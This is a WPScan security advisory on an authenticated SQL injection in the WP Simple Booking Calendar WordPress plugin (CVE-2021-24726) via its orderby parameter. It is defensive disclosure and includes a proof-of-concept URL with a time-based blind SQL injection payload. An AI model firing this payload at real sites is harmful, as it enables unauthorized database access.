logoWordPressPluginsThemesAPISubmitContact
search-icon
logo
search-icon
WordPressPluginsThemesAPISubmitContactSecurity Scanner
Register

WP Simple Booking Calendar <= 2.0.6 (before 07/12/2021) - Authenticated SQL Injection

Description

The plugin did not escape, validate or sanitise the orderby parameter in its Search Calendars action, before using it in a SQL statement, leading to an authenticated SQL injection issue

Note (WPScanTeam): The issue was fixed without bumping the version, so there are two 2.0.6 versions out there, one vulnerable, the other with the fix.

Proof of Concept

https://example.com/wp-admin/admin.php?page=wpsbc-calendars&paged=1&s=MyCal&orderby=name,%28SELECT%20*%20FROM%20%28SELECT%28SLEEP%286%29%29%29a%29&paged=1

Affects Plugins

wp-simple-booking-calendar

Fixed in version 2.0.6

References

CVE

CVE-2021-24726

URL

https://www.trustwave.com/en-us/resources/security-resources/security-advisories/?fid=29176

Classification

Type

SQLI

OWASP top 10

A1: Injection

CWE

CWE-89

Miscellaneous

Original Researcher

Martin Vierula of Trustwave

Verified

Yes

WPVDB ID

f85b6033-d7c1-45b7-b3b0-8967f7373bb8

Timeline

Publicly Published

2021-08-06 (about 4 months ago)

Added

2021-08-09 (about 4 months ago)

Last Updated

2021-09-10 (about 3 months ago)

Our Other Services

WPScan WordPress Security Plugin